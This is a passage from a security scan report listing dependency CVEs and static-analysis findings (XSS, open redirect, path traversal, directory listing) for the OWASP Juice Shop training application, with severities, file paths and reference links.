CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

+ + +
Description
+

Sandbox escape in notevil and argencoders-notevil
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

This affects all versions of package notevil; all versions of package + argencoders-notevil. It is vulnerable to Sandbox Escape leading to +Prototype pollution. The package fails to restrict access to the main +context, allowing an attacker to add or modify an object's prototype. Note: This vulnerability derives from an incomplete fix in SNYK-JS-NOTEVIL-608878.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://github.com/mmckegg/notevil
+https://nvd.nist.gov/vuln/detail/CVE-2021-23771
+https://snyk.io/vuln/SNYK-JS-ARGENCODERSNOTEVIL-2388587
+https://snyk.io/vuln/SNYK-JS-NOTEVIL-2385946

+ + + + + + + +
+
+
+
+ Finding 33: CVE-2026-4046 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 617 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

glibc: glibc: Denial of Service via iconv() function with specific character sets
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The iconv() function in the GNU C Library versions 2.43 and earlier +may crash due to an assertion failure when converting inputs from the +IBM1390 or IBM1399 character sets, which may be used to remotely crash +an application.

+

This vulnerability can be trivially mitigated by removing the IBM1390 + and IBM1399 character sets from systems that do not need them.

+ + + + + + +
Impact
+

fix_deferred

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4046
+https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-4046
+https://packages.fedoraproject.org/pkgs/glibc/glibc-gconv-extra/
+https://sourceware.org/bugzilla/show_bug.cgi?id=33980
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD
+https://www.cve.org/CVERecord?id=CVE-2026-4046

+ + + + + + + +
+
+
+
+ Finding 34: CVE-2026-4437 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 125 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

+ + +
Description
+

glibc: glibc: Incorrect DNS response parsing via crafted DNS server response
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling gethostbyaddr or gethostbyaddr_r with a configured +nsswitch.conf that specifies the library's DNS backend in the GNU C +Library version 2.34 to version 2.43 could, with a crafted response from + the configured DNS server, result in a violation of the DNS +specification that causes the application to treat a non-answer section +of the DNS response as a valid answer.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4437
+https://nvd.nist.gov/vuln/detail/CVE-2026-4437
+https://sourceware.org/bugzilla/show_bug.cgi?id=34014
+https://www.cve.org/CVERecord?id=CVE-2026-4437
+https://www.openwall.com/lists/oss-security/2026/03/23/2

+ + + + + + + +
+
+
+
+ Finding 35: CVE-2026-4438 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

glibc: glibc: Invalid DNS hostname returned via gethostbyaddr functions
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling gethostbyaddr or gethostbyaddr_r with a configured +nsswitch.conf that specifies the library's DNS backend in the GNU C +library version 2.34 to version 2.43 could result in an invalid DNS +hostname being returned to the caller in violation of the DNS +specification.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4438
+https://nvd.nist.gov/vuln/detail/CVE-2026-4438
+https://sourceware.org/bugzilla/show_bug.cgi?id=34015
+https://www.cve.org/CVERecord?id=CVE-2026-4438
+https://www.openwall.com/lists/oss-security/2026/03/23/2

+ + + + + + + +
+
+
+
+ Finding 36: CVE-2026-5435 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H

+ + +
Description
+

glibc: glibc: Out-of-bounds write via TSIG record processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the + GNU C Library version 2.2 and newer fail to enforce the caller-supplied + buffer length, and can result in an out-of-bounds write when printing +TSIG records.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-5435
+https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-5435
+https://sourceware.org/bugzilla/show_bug.cgi?id=34033
+https://www.cve.org/CVERecord?id=CVE-2026-5435

+ + + + + + + +
+
+
+
+ Finding 37: CVE-2026-5450 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 122 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H

+ + +
Description
+

glibc: glibc: Heap Buffer Overflow in scanf with %mc format specifier and large width
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling the scanf family of functions with a %mc (malloc'd character +match) in the GNU C Library version 2.7 to version 2.43 with a format +width specifier with an explicit width greater than 1024 could result in + a one byte heap buffer overflow.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-5450
+https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-5450
+https://nvd.nist.gov/vuln/detail/CVE-2026-5450#range-21286997
+https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450
+https://www.cve.org/CVERecord?id=CVE-2026-5450

+ + + + + + + +
+
+
+
+ Finding 38: CVE-2026-5928 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 127 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:H

+ + +
Description
+

glibc: glibc: Information disclosure or denial of service via ungetwc function with specific wide character encodings
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling the ungetwc function on a FILE stream with wide characters +encoded in a character set that has overlaps between its single byte and + multi-byte character encodings, in the GNU C Library version 2.43 or +earlier, may result in an attempt to read bytes before an allocated +buffer, potentially resulting in unintentional disclosure of neighboring + data in the heap, or a program crash.

+

A bug in the wide character pushback implementation +(_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate +on the regular character buffer (fp->_IO_read_ptr) instead of the +actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). +The program crash may happen in cases where fp->_IO_read_ptr is not +initialized and hence points to NULL. The buffer under-read requires a +special situation where the input character encoding is such that there +are overlaps between single byte representations and multibyte +representations in that encoding, resulting in spurious matches. The +spurious match case is not possible in the standard Unicode character +sets.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-5928
+https://nvd.nist.gov/vuln/detail/CVE-2026-5928
+https://sourceware.org/bugzilla/show_bug.cgi?id=33998
+https://www.cve.org/CVERecord?id=CVE-2026-5928

+ + + + + + + +
+
+
+
+ Finding 39: CVE-2026-6238 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 126 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H

+ + +
Description
+

glibc: glibc: Application crash or uninitialized memory read via crafted DNS response
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the + GNU C Library version 2.2 and newer fail to validate the RDATA content +against the RDATA length in a DNS response when processing LOC, CERT, +TKEY or TSIG records, which may allow an attacker to craft a DNS +response, causing a target application to crash or read uninitialized +memory.

+

These functions are for application debugging only and hence not in +the path of code executed by the DNS resolver. Further, they have been +deprecated since version 2.34 and should not be used by any new +applications. Applications should consider porting away from these +interfaces since they may be removed in future versions.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-6238
+https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-6238
+https://sourceware.org/bugzilla/show_bug.cgi?id=34069
+https://www.cve.org/CVERecord?id=CVE-2026-6238

+ + + + + + + +
+
+
+
+ Finding 20: +javascript.lang.security.audit.unknown-value-with-script-tag.unknown- +value-with-script-tag + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
58
+ + + + + + + +
File Path
/src/routes/videoHandler.ts
+
+
+
+ + + + + +
Description
+

Result message: + Cannot determine what 'subs' is and it is used with a '<script>' +tag. This could be susceptible to cross-site scripting (XSS). Ensure +'subs' is not externally controlled, or sanitize this data.

+ + + + + + + + + + + + +
References
+

https://www.developsec.com/2017/11/09/xss-in-a-script-tag/
+https://github.com/juice-shop/juice-shop/blob/1ceb8751e986dacd3214a618c37e7411be6bc11a/routes/videoHandler.ts#L68

+ + + + + + + +
+
+
+
+ Finding 17: javascript.express.security.audit.express-open-redirect.express-open-redirect + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 601 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
19
+ + + + + + + +
File Path
/src/routes/redirect.ts
+
+
+
+ + + + + +
Description
+

Result message: The application redirects to a URL specified by user-supplied input query + that is not validated. This could redirect users to malicious +locations. Consider using an allow-list approach to validate URLs, or +warn users they are being redirected to a third-party website.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 24: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
277
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 16: +javascript.express.security.audit.possible-user-input-redirect.unknown- +value-in-redirect + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 601 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
19
+ + + + + + + +
File Path
/src/routes/redirect.ts
+
+
+
+ + + + + +
Description
+

Result message: + It looks like 'toUrl' is read from user input and it is used to as a +redirect. Ensure 'toUrl' is not externally controlled, otherwise this is + an open redirect.

+ + + + + + + + + + + + +
References
+

https://owasp.org/Top10/A01_2021-Broken_Access_Control

+ + + + + + + +
+
+
+
+ Finding 15: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
14
+ + + + + + + +
File Path
/src/routes/quarantineServer.ts
+
+
+
+ + + + + +
Description
+

Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 120: CVE-2026-2950 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

+ + +
Description
+

lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.18.0

+

Impact:

+

Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the .unset and .omit + functions. The fix for (CVE-2025-13465: +https://github.com/lodash/lodash/security/advisories/GHSA-xxjr- +mmjv-4gpg) only guards against string key members, so an attacker can +bypass the check by passing array-wrapped path segments. This allows +deletion of properties from built-in prototypes such as +Object.prototype, Number.prototype, and String.prototype.

+

The issue permits deletion of prototype properties but does not allow overwriting their original behavior.

+

Patches:

+

This issue is patched in 4.18.0.

+

Workarounds:

+

None. Upgrade to the patched version.

+ + +
Mitigation
+

4.18.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2950
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh
+https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg
+https://nvd.nist.gov/vuln/detail/CVE-2026-2950
+https://www.cve.org/CVERecord?id=CVE-2026-2950

+ + + + + + + +
+
+
+
+ Finding 13: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
14
+ + + + + + + +
File Path
/src/routes/logfileServer.ts
+
+
+
+ + + + + +
Description
+

Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 123: CVE-2025-13465 Lodash 4.17.21 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash4.17.21
+ + + + + + + +
File Path
juice-shop/node_modules/lodash/package.json
+
+
+
+ + + + + +
Description
+

lodash: prototype pollution in .unset and .omit functions
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.17.23

+

Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the .unset and .omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.

+

The issue permits deletion of properties but does not allow overwriting their original behavior.

+

This issue is patched on 4.17.23

+ + +
Mitigation
+

4.17.23

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:2452
+https://access.redhat.com/security/cve/CVE-2025-13465
+https://bugzilla.redhat.com/2431740
+https://errata.almalinux.org/9/ALSA-2026-2452.html
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81
+https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg
+https://linux.oracle.com/cve/CVE-2025-13465.html
+https://linux.oracle.com/errata/ELSA-2026-2452.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-13465
+https://www.cve.org/CVERecord?id=CVE-2025-13465

+ + + + + + + +
+
+
+
+ Finding 124: CVE-2026-2950 Lodash 4.17.21 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash4.17.21
+ + + + + + + +
File Path
juice-shop/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

+ + +
Description
+

lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.18.0

+

Impact:

+

Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the .unset and .omit + functions. The fix for (CVE-2025-13465: +https://github.com/lodash/lodash/security/advisories/GHSA-xxjr- +mmjv-4gpg) only guards against string key members, so an attacker can +bypass the check by passing array-wrapped path segments. This allows +deletion of properties from built-in prototypes such as +Object.prototype, Number.prototype, and String.prototype.

+

The issue permits deletion of prototype properties but does not allow overwriting their original behavior.

+

Patches:

+

This issue is patched in 4.18.0.

+

Workarounds:

+

None. Upgrade to the patched version.

+ + +
Mitigation
+

4.18.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2950
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh
+https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg
+https://nvd.nist.gov/vuln/detail/CVE-2026-2950
+https://www.cve.org/CVERecord?id=CVE-2026-2950

+ + + + + + + +
+
+
+
+ Finding 204: CVE-2024-28863 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

node-tar: denial of service while parsing a tar file due to lack of folders depth validation
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.2.1

+

node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no + limit on the number of sub-folders created in the folder creation +process. An attacker who generates a large number of sub-folders can +consume memory on the system running node-tar and even crash the Node.js + client within few seconds of running it using a path with too many +sub-folders inside. Version 6.2.1 fixes this issue by preventing +extraction in excessively deep sub-folders.

+ + +
Mitigation
+

6.2.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2024:6147
+https://access.redhat.com/security/cve/CVE-2024-28863
+https://bugzilla.redhat.com/2293200
+https://bugzilla.redhat.com/2296417
+https://bugzilla.redhat.com/show_bug.cgi?id=2293200
+https://bugzilla.redhat.com/show_bug.cgi?id=2296417
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22020
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28863
+https://errata.almalinux.org/9/ALSA-2024-6147.html
+https://errata.rockylinux.org/RLSA-2024:6147
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7
+https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7 (v6.2.1)
+https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36
+https://linux.oracle.com/cve/CVE-2024-28863.html
+https://linux.oracle.com/errata/ELSA-2024-6148.html
+https://nvd.nist.gov/vuln/detail/CVE-2024-28863
+https://security.netapp.com/advisory/ntap-20240524-0005
+https://security.netapp.com/advisory/ntap-20240524-0005/
+https://www.cve.org/CVERecord?id=CVE-2024-28863

+ + + + + + + +
+
+
+
+ Finding 23: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
273
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 128: CVE-2024-4067 Micromatch 3.1.10 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
micromatch3.1.10
+ + + + + + + +
File Path
juice-shop/node_modules/micromatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

micromatch: vulnerable to Regular Expression Denial of Service
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.8

+

The NPM package micromatch prior to 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* + will greedily match anything. By passing a malicious payload, the +pattern matching will keep backtracking to the input while it doesn't +find the closing bracket. As the input size increases, the consumption +time will also increase until it causes the application to hang or slow +down. There was a merged fix but further testing shows the issue +persists. This issue should be mitigated by using a safe pattern that +won't start backtracking the regular expression due to greedy matching. +This issue was fixed in version 4.0.8.

+ + +
Mitigation
+

4.0.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-4067
+https://advisory.checkmarx.net/advisory/CVE-2024-4067
+https://advisory.checkmarx.net/advisory/CVE-2024-4067/
+https://devhub.checkmarx.com/cve-details/CVE-2024-4067
+https://devhub.checkmarx.com/cve-details/CVE-2024-4067/
+https://github.com/micromatch/micromatch
+https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448
+https://github.com/micromatch/micromatch/commit/03aa8052171e878897eee5d7bb2ae0ae83ec2ade
+https://github.com/micromatch/micromatch/commit/500d5d6f42f0e8dfa1cb5464c6cb420b1b6aaaa0
+https://github.com/micromatch/micromatch/issues/243
+https://github.com/micromatch/micromatch/pull/247
+https://github.com/micromatch/micromatch/pull/266
+https://github.com/micromatch/micromatch/releases/tag/4.0.8
+https://nvd.nist.gov/vuln/detail/CVE-2024-4067
+https://www.cve.org/CVERecord?id=CVE-2024-4067

+ + + + + + + +
+
+
+
+ Finding 12: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
14
+ + + + + + + +
File Path
